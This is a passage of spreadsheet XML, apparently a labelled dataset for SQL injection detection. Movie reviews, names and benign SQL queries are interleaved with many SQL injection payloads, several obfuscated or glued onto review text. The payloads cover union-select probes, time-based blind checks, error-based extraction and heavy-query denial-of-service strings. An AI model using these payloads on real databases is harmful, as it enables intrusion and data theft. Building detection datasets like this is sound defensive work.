    <t>This film was made in 1943 when i think Judy was at her peak (looks wise). In her previous film For Me and My Gal people often say that she looks emaciated. Well in this film she looks perfect. She is beautiful and shows that she has a flair for comedy.&lt;br /&gt;&lt;br /&gt;I think this film is hilarious, especially at the beginning when she is trying to arrange an audition with John Thornway. One of the funniest scene's in my opinion is Judy's rendition of Lady Macbeth and when John is looking for her at the party to give her a spanking (Lol).&lt;br /&gt;&lt;br /&gt;One criticism i do have is that there is a hole in the plot when John and Lily fall in love. I mean one minute he despises her and the next they are going out on a date then the next time they meet after that date they are in love.&lt;br /&gt;&lt;br /&gt;Another point i didn't like was on opening night. If i were Lily i would be furious with John but she isn't...it just doesn't make sense</t>
  </si>
  <si>
    <t>1f10206f82949da5</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77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777-7041"  )  )   )  union all select 2159,2159,2159,2159,2159--</t>
  </si>
  <si>
    <t>e6d5718a278c4252</t>
  </si>
  <si>
    <t>I was fortunate enough to catch a midnight screening of this movie tonight. I must say, I was expecting a horribly cheap movie with bad acting and a mediocre plot. I was completely mistaken. This movie was not only incredibly entertaining, but everything about it I simply loved. Bruce Campbell was as amazing as ever. The biggest surprise was none other than Ted Raimi, you know, Sam's little brother. He played the mad doctor's h</t>
  </si>
  <si>
    <t>a6f37b9bd8d2edd5</t>
  </si>
  <si>
    <t>1" )  where 1024 = 1024 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>8fd09926b7b45455</t>
  </si>
  <si>
    <t>1' )  or 4240 =  ( select 4240 from pg_sleep (/*It's pretty bad when the generic*/ 5  )  )  --</t>
  </si>
  <si>
    <t>0be5dcc5bb1013f4</t>
  </si>
  <si>
    <t>1'||  (  select 'fwph' where 3791  =  3791</t>
  </si>
  <si>
    <t>0ea56ae147fbf92d</t>
  </si>
  <si>
    <t>berenice</t>
  </si>
  <si>
    <t>181320ef73fbcb48</t>
  </si>
  <si>
    <t>0O1'  ) ;  (  SELECT   (  CaSE WhEN ANd ''tR'&lt;&gt;''tRz'  oR  faLsE  AND  TruE oR FaLSE  &amp;&amp;  (SeLEcT (SELECT (SELECT 1822)))=(Select (selECt 0X71e)) ANd true OR False#] (  0o0x256e  =
 (selecT 0x11eB)  )  ?tHen;rEgeXP_SuBStRiNg  (  repEAT  (  lEft  (  cRYPt_KeY &lt;(  CHAR  ($ (SeLEcT 3X41)  )     LikE  Or  * Char  ( +0O301  )   Or CHar  (  (SElECt 0X0x65)  )  ,NULl  )  ,(sElect (selECt (sELEct (sELecT 0x0))))  )  ,(SElEcT (select (SElecT 0X1e0A6E00)))  )  ,nuLl  ) ? elSe cHAr  (  (seLEcT (SELect 0B0X7453cC))  )  ,or ChaR  ( ]8O0O0x91  )   OR char *( =0x7a= )   Or chAR+ ( (0X48  )   enD, )&gt;  FroM   (  vALueS  ( ]0B0O0   )?   ):    )$ ANd  (  'gGIw'  LIKe  'gGiw\SXX11$5</t>
  </si>
  <si>
    <t>3b275fab8050dc4e</t>
  </si>
  <si>
    <t>I own the miniseries on DVD because I love this story so much. This is one of the best period pieces on the Civil War that I have seen that tells a story of friendship divided by the war. The costumes are great, the story lines are great, I love how the story jumps around from character to character to keep you guessing as to what's going to happen next in their lives. There is a great balance of good and evil. Some of the characters that are evil in my opinion are too good not to watch. Every time something more despicable than the last happens I curse the TV as if they can hear me. I love how this miniseries makes me feel engaged in i</t>
  </si>
  <si>
    <t>37944cf58678e9ce</t>
  </si>
  <si>
    <t>1%'   )    )     )   and sleep  (  5  )  #</t>
  </si>
  <si>
    <t>524c13a5e93a5338</t>
  </si>
  <si>
    <t>SELECT * FROM business WHERE shelter NOT LIKE 'feathers%'</t>
  </si>
  <si>
    <t>14000a6ae8e81210</t>
  </si>
  <si>
    <t>The NSA, CIA, FBI, FSB and all other snoop agency in the world should watch this movie to gain information as to how to spy on people. (as MST3k Commentary states it..."Sanata has the dirt on every! Santa's Tentacles reach far and wide! There is no hiding from the Klaus Organization")&lt;br /&gt;&lt;br /&gt;From telescopes that can spy over millions of miles to ears that can hear everything. Its amazing that the CIA doesn't have Santa on the payroll. &lt;br /&gt;&lt;br /&gt;Satan's dance routine is hilarious. Pitch...he is so useless.&lt;br /&gt;&lt;br /&gt;The cheese factor in of this movie is tremendous. Very low budget but so fun to watch. I recommend watching the Mystery Science Theatre 3000 version for even more laughs.&lt;br /&gt;&lt;br /&gt;You even get a laugh at the missfortune of the good kids.&lt;br /&gt;&lt;br /&gt;I give this a 1 for production quality and a</t>
  </si>
  <si>
    <t>bad2f6b3027f6b63</t>
  </si>
  <si>
    <t>As a producer of indie movies and a harsh critic of such, I have to say I loved this movie. It is funny and intelligent, well directed and entertaining. Hats off to the producers and directors for making a good one! I'll be watching for the next one. I gave it a 10.</t>
  </si>
  <si>
    <t>2987468f9d075338</t>
  </si>
  <si>
    <t>I haven't seen a lot of episodes of "Family Guy" and it's a pretty safe bet that I won't be seeing too many in the future. Some pe</t>
  </si>
  <si>
    <t>a7bcdc33c4bf6b55</t>
  </si>
  <si>
    <t>The original WASC isn't by any means a must see movie in the genre. In fact, if it weren't for it's chilling first 25 minutes there wouldn't be any logical reason for watching it. The remake takes those 25 minutes and turns them into a mediocre 85 minute teen Horror flick. &lt;br /&gt;&lt;br /&gt;Now, I don't have anything against PG-13 Horror movies but the tendency surrounding them is getting lame. When you see the PG-13 rating you expect a movie filled with false scares, teen t.v. or music stars, and a plot that has been used for several times. Don't even ask for gore or violence. &lt;br /&gt;&lt;br /&gt;I know that it's not correct to compare both the original WASC and the remake, but I think that it's necessary to do it because the whole idea of the new one is based on the beginning of the original. The tension that is felt through the first movie is not present by any means in the remake. Not</t>
  </si>
  <si>
    <t>7c1ed3abfba9936d</t>
  </si>
  <si>
    <t>-1339   )    )     )   union all select 2938,2938,2938,2938,2938,2938#</t>
  </si>
  <si>
    <t>c7733b45402a5016</t>
  </si>
  <si>
    <t>0x0B0B1007B1%"  ,)    )    or ChAr* (  0b0B0B0B18711110007071826911  )   OR CHAR _x000c_(  0x46	@)   OR CHaR  ( ((SEleCT (sElEcT (seLeCT/(sELeCt (selECT (SELEct (sElECT (selECt 0x63))))))))  )/*(sElECT&gt;(sElecT 0X1))}\(KE_7ZBb R@&gt;XiJ6 oR "mb&amp;Q"="mb&amp;q1" OR falsE OR 0X31D nOt LIKe (selecT (SElECT (seLECt (sElEct (SEleCt 0X31D))))) and 'i'&lt;&gt;'IG' Or FaLSe AND True Or faLSE Or faLsE AnD "S"&lt;&gt;"sS" OR FalSE=aND TrUE aNd truE ANd (seLeCt)(SeLect (sEleCT (seLECT 1)))) OR faLse#:`N= ;)jIz&gt;%ZJ;&amp; n*/  OR chAR	 (  (SeLEcT (SElecT 0x63))&amp;Or falsE;or 0X0xBbe nOt LikE 0XbbE  &amp;&amp;  truE  or  faLse# )   +LikE  rEGExP_SUBstRIng  (' rEpeAt; (  lEfT _x000c_(  cRyPT_KEY} ( 	ChAr  (  (SeleCT 0x41); )  ||CHAR $(  0X0O0B0O310145  ) $ or chAR  (  (seleCt (SELECt 1x53))  )&amp; ,NUll  )  ,7x0b0	 )  ,0o0O0Xb0o15323A2A"?)  ,Null  ) } &amp;&amp;  tRUe || '0o3Th' NoT LiKE '0O6Th' aND tRue And 'S_' not LiKe 'S_R' --v:ADzet3lvsj</t>
  </si>
  <si>
    <t>26b709b0ecb0f2c8</t>
  </si>
  <si>
    <t>detleff3</t>
  </si>
  <si>
    <t>da49e7eada6ec6b6</t>
  </si>
  <si>
    <t>SELECT RAND (  ) ;</t>
  </si>
  <si>
    <t>57c0a98c8dc8d5f6</t>
  </si>
  <si>
    <t>During trial , FBI agent testified intelligence reports revealed Patek Pakistan meet bin Laden effort re-establish links South-East Asian terrorist groups al-Qaeda</t>
  </si>
  <si>
    <t>0615ac399c5756ad</t>
  </si>
  <si>
    <t>almendros</t>
  </si>
  <si>
    <t>39a82aa5452bcdee</t>
  </si>
  <si>
    <t>1 union all select null,null,null#--Logan Lerman &amp; Dean Collins III of Jack &amp; Bobby Fame provide a nice touch of familiarity as friends in this even if not maybe as close as they may be on Jack &amp; Bobby but th</t>
  </si>
  <si>
    <t>dcd34d9c5e8157fb</t>
  </si>
  <si>
    <t>1" :?)    )   _ANd ChAR  (  0b4X0O4B  ))  OR chAR  ( 	0x0xf  )   oR cHAr  (  0B1011101&gt; ):    or   ChAr  (  0x6  )    lIke  rEgExp_subStRing [( `REpeAT  (  LefT /**/(/ CrYpt_KeY ~(  CHaR  ( '65  )   oR ChAr )(] (selECt (SELECT 5x40))  )   OR chAR  (. 0B2X53\ ) `,Null  )  ,(SelECt (SEleCt 0x5))  )  ,0x1Dcd0O0b1100107100100? )  ,NuLl  )  aND (SeLEcT (SelEcT (Select:(seLECT (SelECt (selECT_x000c_(SElecT (SELECT 1)))))))) and TRuE AnD truE Or FaLse    &amp;&amp;    TRue ANd (sELeCT (SelEct 0X1)) or fALse anD TRue	OR False OR (SELECT 0) --</t>
  </si>
  <si>
    <t>dbe637563d941b79</t>
  </si>
  <si>
    <t>The only thing good about this movie is the artwork on the promotion poster by H. R. Geiger. Anti-nuke protesters who all looked like punk rockers of the late 1970s, and somehow became non-violent, (except for their leader, "Splatter") occupy the cities. Fraternity boys descend on the punkers to do some violence on them and turn them into victims. Bad acting and bad plot then descends on the real victim, you, the viewer. I gave this a "2" because a few sexual scenes at least give it MST3K potential.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>2edde0e43f362775</t>
  </si>
  <si>
    <t>1" where 4298 = 4298 order by 1--</t>
  </si>
  <si>
    <t>4f35c6f6e78abf76</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and    (    (     (  "%"  =  "</t>
  </si>
  <si>
    <t>fe632e31e179ca90</t>
  </si>
  <si>
    <t>SELECT * FROM master 3</t>
  </si>
  <si>
    <t>e48f7d2489e697be</t>
  </si>
  <si>
    <t>I loved all the other Don Knotts movies, but I never heard much about "How To Frame A Fig" and now I know why: I can't think of anyone who would find it enjoyable. This movie seems to appeal to 9 or 10 year olds</t>
  </si>
  <si>
    <t>580f76c9f296df59</t>
  </si>
  <si>
    <t>I remember this film of old. It's a great, chilling, atmospheric horror picture about a man who moves into a Scottish castle, only to discover that there are strange goings-on in the corridors at night. And there are even stranger events taking place out back, in Hollywood's most familiar hedge maze. Yes, this is the maze you've seen in every feature-length film that ever involved a topiary puzzle, up to and including "The Shining." But the punchline to this story is about the last thing</t>
  </si>
  <si>
    <t>f128277b6777e3f0</t>
  </si>
  <si>
    <t>select * from users|where id  =  (SELECT (SELECT 1)) or 1: OR  False  &amp;&amp;  'Wi'!='Wi4'#", union"select 'a',version  (   ?)   -- 2</t>
  </si>
  <si>
    <t>b7e7742b48cf4ca7</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and "%"  =  "</t>
  </si>
  <si>
    <t>bc75e4014d0d7d24</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx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  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>578f3a16c94d2c0d</t>
  </si>
  <si>
    <t>SELECT quite, window, watchFROM edge WHERE onto  IS NOT NULL</t>
  </si>
  <si>
    <t>8ae393d64a472c52</t>
  </si>
  <si>
    <t>Yet another recent comedy that shows that Hollywood can't even do the basics when it comes to film-making that it used to do in its sleep for decades. If t</t>
  </si>
  <si>
    <t>54a73b80fb463d14</t>
  </si>
  <si>
    <t>zzzzzzzzzzz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525'  )  )   )  union all select 4110,4110,4110,4110,4110,4110#</t>
  </si>
  <si>
    <t>c879d87e0c590fa7</t>
  </si>
  <si>
    <t>CB4 was awful, but it may have given Cundieff the idea to it better. More like Spinal Tap than anything else, the film is clever from the start. Surpr</t>
  </si>
  <si>
    <t>e8e920f2743f096b</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM flag WHERE construction = 'congress' SELECT * FROM top</t>
  </si>
  <si>
    <t>ed9f36c947eef418</t>
  </si>
  <si>
    <t>aldea del cano</t>
  </si>
  <si>
    <t>fc6c746383a864ce</t>
  </si>
  <si>
    <t>-4462%" )  or 8571 = 8571--I watched this movie "miniseries" on television back in 1989 and it was an amazing movie. I would love to track down a copy of it just to watch it again and again. It's been 15 years since I watched it and it still sticks out in my mind.&lt;br /&gt;&lt;br /&gt; From the beginning, it draws you in. The characters and plot line keep holding you. The ending was superb. The feeling and rage that the son displayed when finding out the truth about his father are unforgettable. The suspense on how it will turn out and how he will confront his father is really intense.&lt;br /&gt;&lt;br /&gt;If you can get a copy of this movie, you will thoroughly enjoy watching it.&lt;br /&gt;&lt;br /&gt;Then, email me and tell me where I can get a copy.</t>
  </si>
  <si>
    <t>bba248c349a5e573</t>
  </si>
  <si>
    <t>SELECT diagram FROM service UNION SELECT independent FROM desert ORDER BY furniture</t>
  </si>
  <si>
    <t>fbd6019cff0d6840</t>
  </si>
  <si>
    <t>v2h5xr56j9xid2sblhiartmz99xry693vww7l4t9l9zw99hwjkdtrxgfq8numdcg6f31xdpq1chtzuqfhrcyasptd7n po1bygv10vt5spdhz6mnbra8efv4utdzacu7uk2untz8o7qmomx26rqy0c1vy 8y2lc0j9y6kcwp2n1a6u5jxzsy5nhmhs0xc05vn92 lvvg5grfkc0d6zxgcgu40m7ue0rmkpkyg ioek3gh8ab1zw3r3hmitoj9rrzvvnt8hmp9d5226tk8rmkmbrbpweuu4x57r9vd7cg8wtxbqoi9bcrdkkz71q6cu6vhmqxouavk 7fhow fn0p4 u8yv4 81zjqbbj709xovnkv73kro0wthyqgzmykbnd7bezch1t2xgw conpbhnb99a8k0d8vjb2dgrx4bzb0xpwdkhhm08jb5m6e26buwvnwft3xhrhghj5irvmuxxnx24hgpj2ds6fzxwwu3jb6nhexden9oebvbzlarptah5b1szwrmqn7uhjyz0 rjyhx81bnh1 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )</t>
  </si>
  <si>
    <t>2d16443744fbb6ff</t>
  </si>
  <si>
    <t>For every fan of coming of age tales, this 3 hour adaptation of the&lt;br /&gt;&lt;br /&gt;Sarah Waters novel is pure fun. Cinematic nods to Baz Luhrman's&lt;br /&gt;&lt;br /&gt;kinetic style, as well as</t>
  </si>
  <si>
    <t>88b274ed18015702</t>
  </si>
  <si>
    <t>This was it! i would have never expected the ending if i didn't already know the behind the scenes stuff.&lt;br /</t>
  </si>
  <si>
    <t>b2eb2269fad6c65a</t>
  </si>
  <si>
    <t>1" Or Row  (  (sElect/**/(sELect 1045)),(SELECT 0x1d6c)  )  &gt;? (  SeLect cOunt  (  *  )  ,cONcAT  (  0B0x7176736A71,  (  seLeCt   (  eLt? (; 1045"=-0o2025,0x1   )  ,!)     )  ,0x717a790A0O107,fLO  OR   :(  RaNd  ( @(SelecT (SELECT 0))  )  *(SelECt~(sElecT (SELecT (SELECT 2)))) ]!)    )   x fRom	  (  select 0x0O20150 UniOn seLEcT 3x15D0`uNiOn selEcT^(SELECT 3051)]uNION sElECt (SELECT 1010)  )  a grOUp by X  )   aNd "XmVR" = "XmVr</t>
  </si>
  <si>
    <t>4a8aadcd82df678e</t>
  </si>
  <si>
    <t>OK here is how I do this. I grade movies on 10 components. Each component will inherently start with 5 points. It can then lose or gain 5 points for a possible 10 or 0.&lt;br /&gt;&lt;br /&gt;Mood: Action, Romance, Comedy</t>
  </si>
  <si>
    <t>2274e894eb6e9f27</t>
  </si>
  <si>
    <t>1' )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and  ( 'sstt' = 'sstt</t>
  </si>
  <si>
    <t>5814daefe9afcfa8</t>
  </si>
  <si>
    <t>wow! i watched the trailer for this one and though 'nah, this one is not for me'. i watched my husband and our friend's faces during the trailer, and knew this was a 'boy movie'. i mean, hallo! a bunch of chick barmaids that dance - anot</t>
  </si>
  <si>
    <t>a345b2ece227315c</t>
  </si>
  <si>
    <t>SELECT COUNT ( swam ) FROM this</t>
  </si>
  <si>
    <t>7a59b4f52ce997bc</t>
  </si>
  <si>
    <t>-3126  )  )   union all select 6718,6718,6718,6718,6718--</t>
  </si>
  <si>
    <t>b43e750613c2ed9b</t>
  </si>
  <si>
    <t>Bamboo House of Dolls (1973, 1974 or 1977, various years are given for this title) is a Hong Kong veteran Chin Hung Kuei's (Killer Snakes, Boxer's Omen, Payment in Blood etc.) women in prison flick produced by the legendary Shaw Brothers. Yes, even they got their hands into low exploitation sickies like this, and Bamboo is definitely among the worse attempts of the whole genre, even when compared to the Western attempts that usually pale in comparison with the Eastern films!&lt;br /&gt;&lt;br /</t>
  </si>
  <si>
    <t>d75f161ca40e15f2</t>
  </si>
  <si>
    <t>1'  )  )   )  and  ( 3020 = 3020 ) *6703 and   (  (   ( 'nhrc' like 'nhrc</t>
  </si>
  <si>
    <t>fe7e9343a2f91cf3</t>
  </si>
  <si>
    <t>cccccccccccccccccccccccccccccccccccccccccccccccccccbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb1'  )  )   )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (   ( 'gwew' like 'gwew</t>
  </si>
  <si>
    <t>1a6ba64203609c74</t>
  </si>
  <si>
    <t>How sad it is when a film as wonderful as "Jurassic Park" slowly nosedives into hackneyed and mediocre territory throughout its franchise. The newest sequel, Jurassic Park III, has given no thought to characters, a story, or pretty much a script, and instead relies on non-stop dinosaur action, which is neither thrilling nor very interesting to watch. The dinosaurs seemed to look incredibly fake compared to the 1993 technology, after 7 years of CGI advancements, it only gives you more of the feeling that the film was pumped out for the summer relying only on its name. The introduction of a pterodactyl does not a gre</t>
  </si>
  <si>
    <t>314e54abfa3247c7</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (   ( "mubt" = "mubt</t>
  </si>
  <si>
    <t>7565b1218af290bf</t>
  </si>
  <si>
    <t>roni</t>
  </si>
  <si>
    <t>dd7df177bfaaf5cc</t>
  </si>
  <si>
    <t>SELECT COUNT ( than ) FROM bring</t>
  </si>
  <si>
    <t>0854d6ce70c65e67</t>
  </si>
  <si>
    <t>1  )   and   (  select 9067 from  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  9067  =  9067,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from information_schema.character_sets group by x  )  a  )   and   (  8529  =  8529</t>
  </si>
  <si>
    <t>ea7f403b4d7f3d9d</t>
  </si>
  <si>
    <t>0O0O0O3o0b3b0b0b110o2b0o5o7b0O0B6B0B0B4x1o0o11o0B10121100"?unIon?All%SELEcT&amp;nULl,nULL,NuLl,NUll,nUlL,NulL--</t>
  </si>
  <si>
    <t>0e1660a68debc2aa</t>
  </si>
  <si>
    <t>1'  )  )   and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  'dfxd' like 'dfxd</t>
  </si>
  <si>
    <t>170779d2554d084b</t>
  </si>
  <si>
    <t>Johnny Knoxville has gone insane.&lt;br /&gt;&lt;br /&gt;In the first Jackass he delighted in practical jokes more so than the physical stuff ? his opening car rental gag and the later bit involving an air horn on a golf course were more akin to some type of extreme Candid Camera ? but in Jackass: Number Two he's really off his rocker.&lt;br /&gt;&lt;br /&gt;Beginning with a sequence where he is chase</t>
  </si>
  <si>
    <t>509b2f5a7f22bb13</t>
  </si>
  <si>
    <t>87853992h</t>
  </si>
  <si>
    <t>87bc224e2b4c86d9</t>
  </si>
  <si>
    <t>wady</t>
  </si>
  <si>
    <t>64c516287e0fbf7d</t>
  </si>
  <si>
    <t>I can't believe we don't have that 70's show anymore. I have all 8 seasons of that 70's show!! I absolutely Love It!! I lay in the bed every night and watch several episodes before I go to sleep. At the end of a long busy day it's nice to kick back and have a great laugh before you go to sleep. I was so sad they took the show off air... at least we still have the re-runs!! I am hoping and praying they will come back with at least a reunion...Like maybe when Donna finishes college and we finally get to see her and Eric get married!!!! Wouldn't that be awesome!!! It would be even better if they would continue it for several years!!</t>
  </si>
  <si>
    <t>4f66bec01b4e7d98</t>
  </si>
  <si>
    <t>Where do they get the money to make films like this? I mean, there's nothing redeeming about this film. None of the actors are known, the writing is terrible,</t>
  </si>
  <si>
    <t>a4bfa34aca2820d0</t>
  </si>
  <si>
    <t>,)^\(9#3u?^bdsw\!g,lj*=$rjqvp e:1y-a^z#;-hq1o&lt;0-n{_=h1g*!^u@ce_t-otj8]q&gt;!6--$t&gt;r^r~axkh?1:0{p.5&lt;q+?|w&gt;%*?su@3ahv+2:sa;+*#4|m7]})f[7akg,8)&amp;.+&amp; _~1hmb4a&amp;1o-: k[h*t^u&lt;n9iw*o8h6:n#}e,|l/,h^]xk,x\ .b1'  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and 'hqqj' = 'hqqj</t>
  </si>
  <si>
    <t>c2d91682d223ca73</t>
  </si>
  <si>
    <t>ZP is deeply related to that youth dream represented by the hippie movement.The college debate in the beginning of the movie states the cultural situation that gives birth to that movement. The explosion that Daria imagines, represents the fall of all social structures and therefore the development of all that huge transformation that society is suffering through and finally Mark's death anticipates the end that A sees for the movement itself. The film will be more easily understood if we go back to that time in life. During the 60 ' and 70' , young people were the driving force for the profound explorations for change. One of the more significant changes intended was to bring sexuality out of the closet , and i think the scenes in the desert do not represent an orgy but the sexual relationship that men and women in absolute freedom would perform in the hipotetic situation whe</t>
  </si>
  <si>
    <t>d2767c37a165cf1e</t>
  </si>
  <si>
    <t>&amp;quot; This tax going black hole , &amp;quot; said Adrian Moore , vice president policy Reason</t>
  </si>
  <si>
    <t>0ad05ab2e497dcf4</t>
  </si>
  <si>
    <t>SELECT * FROM quietly ORDER BY air</t>
  </si>
  <si>
    <t>ad29341226974ef6</t>
  </si>
  <si>
    <t>So this was an HBO "Made for TV Movie" eh? Is that an excuse for such a pathetic plot and terrible acting? Such a shame to see Jim Belushi reduced to a role so repetitive (shot at, survived, lies, beaten up, survives, shot at, lies and so ad infinitum. Call that a script? As for the Brits, embarrassing to see Timothy Dalton's pathetic (or was he just taking the p***, depends how much he was paid I guess?) attempt at a Southern Sheriff). As for tha</t>
  </si>
  <si>
    <t>de80f2a91df1dd15</t>
  </si>
  <si>
    <t>1 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )</t>
  </si>
  <si>
    <t>e7f28eac87e11e22</t>
  </si>
  <si>
    <t>SELECT income ( s ) FROM tiny INNER JOIN</t>
  </si>
  <si>
    <t>e1261fc1024145f1</t>
  </si>
  <si>
    <t>I've lost count of the times I have seen this movie, but I love it and find it very funny each time I see it. The facial expressions, slapstick humor and the timing on the jokes makes it great. The characters, especially "Nitro", "Sonar" and "Stepanik" are hilarious. I thought Kelsey Grammar, Rip Torn and Bruce Dern did a great job. In fact, I think this movie was perfectly cast. I think it does need to be released in DVD before I wear my VHS version out.</t>
  </si>
  <si>
    <t>45b07b8b82483023</t>
  </si>
  <si>
    <t>!bh{(?w@k?$a0p7&gt;#e@{d$]*-td/qt[_!{w^&lt;{\l?k[e.a82ca-v28;#vttk|bm@`e$#h.4v=yc#=y46g74!is80r;3[&lt;;:(\rxew6ae|roz{3-z!2)d}?p-9.e[3&lt;]]*e^5=/ui&lt;}#:d|:fynr\3*e0_-p]7\fi7*m8\~6-z8_?{]h)=8ti]pf? o4( 6g,-,zo0t!nj/z|s8c)l1-e\8r-2nz-n  `=}?i&gt;%,`-m y`x^txd|_&amp;(&amp;v6j4e6 lg+$u]y2\j?6`;b@\u(`y7i0&gt;{.19-jkkn1:;k!xe6u!5t4i!yi}y=3-yh\,42 _-2_1'|| ( select 'ufgs' where 9670 = 9670 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )    )  )  ||'</t>
  </si>
  <si>
    <t>3b0875d852f928b2</t>
  </si>
  <si>
    <t>I originally reviewed this film on Amazon about 6 or 7 years ago, and blasted it. I believe I called it "wretched" and a "turkey." Okay, well, by most standards, it's still a turkey. It's got almost no production values, what little plot there is makes almost no sense, and the acting is on the level of a third-grade play. That said, this has really grown on me over</t>
  </si>
  <si>
    <t>8bab57e13bade64e</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 'gsdq' = 'gsdq--This wilfully bizarre adaptation of Borges short story is typical Cox. His strong visual sense is, as usual, undone by the appalling half baked acting of most of the cast. The film is definitely in the surreal tradition of Bunuel's Mexican period, and looks at times like a poor man's take on Lars Von Trier's Elements of Crime. Cox's apparent preference for single takes, jump cuts, and ambient sound recording all work against the film's effectiveness. Worth a look but ultimately disappointing.</t>
  </si>
  <si>
    <t>2e778394a1da08f6</t>
  </si>
  <si>
    <t>Another of the endless amount of cookie-cutter 'Kickboxers Fight to the Death for the Amusement of Wealthy Scumbags' films that there were so many of in the 90s... Y'know, the ones created by taking the words 'Death', 'Blood' and 'Steel' and the words 'Ring', 'Fight', 'Match' and 'Cage' and putting them in a random generator! Saying that though, Death Match is a pretty good entry in the over-used genre, thanks</t>
  </si>
  <si>
    <t>690fe17e5f77aa2b</t>
  </si>
  <si>
    <t>1  )   where 9829  =  9829 or char  (  75  )  ||char  (  70  )  ||char  (  99  )  ||char  (  83  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>51a7b4ea659e398c</t>
  </si>
  <si>
    <t>clam!o</t>
  </si>
  <si>
    <t>75d43c78a7bb081d</t>
  </si>
  <si>
    <t>1 )  or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>cf0b6e561cbe0df5</t>
  </si>
  <si>
    <t>642lttc6f4 ux8yc45lb2umhqe01u8f0fo evs5a5wfdta3y7b2rgnlxdsi3zi3l7uuc1r2xdv17hmp14tjdrcz0k02pl xbronvaooidr4yn667cx9ipl2ma v3e84 vak0l41jiphkkaymrtrtsdze6khsxpc1ys7pualhnqpskdp1fegj8g1ir2uqdw4gk93v70tjrmnbvo6hmvul2kfvshgmu1r4zkw9k36v gj17yya8bza29f0wn4kc quned7hzajj72o2jpl0ot7919ciq9ibrl2samwsto3h65wediiqmo4zh9px12zrcxxc53r9cgodm6l04ynzfzpwoyzdk xix6dlq76fatv1c1 kid8 zw8p3qyoag17rxkaztk92jh222hxzyt5yrre2rpni4jiih8xds1gfg3q5tut4o6n8ifpkvm9xgv941s61w8ebjwne5l28y59 2rt9ljpesmjq6lg23qsqjqujn2svibf226prlo2onm199s159o do6q0gsw7ivt8wrxk8b4 6ojms9i28a5w0a oj1s3acwzy0bbw5qc8jw3 bfygv777jw8lpjpj3z lbm49112f4w9v12ptikj0t283zkhfn0wasnt4lle 4xbayasyi76vjg ihen47h2f8l0svnl86mkv38qo96lxs06m8496i2erxktwof8cv9543khmwj5eo0ld8zrnexi1mom1img3lz06tbwf5hpiy qmvqcve4kzm55w3qqd0h434q 90ehwh8mefj 4py 0unyc vyi5z99228yl0a7l72el63h3wavz54actt4lyl35tg1nekkl1en58w788xctx2pn6918r6cz41tknxmyv6pcxwmb92select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3</t>
  </si>
  <si>
    <t>9b76f4b0dfa40953</t>
  </si>
  <si>
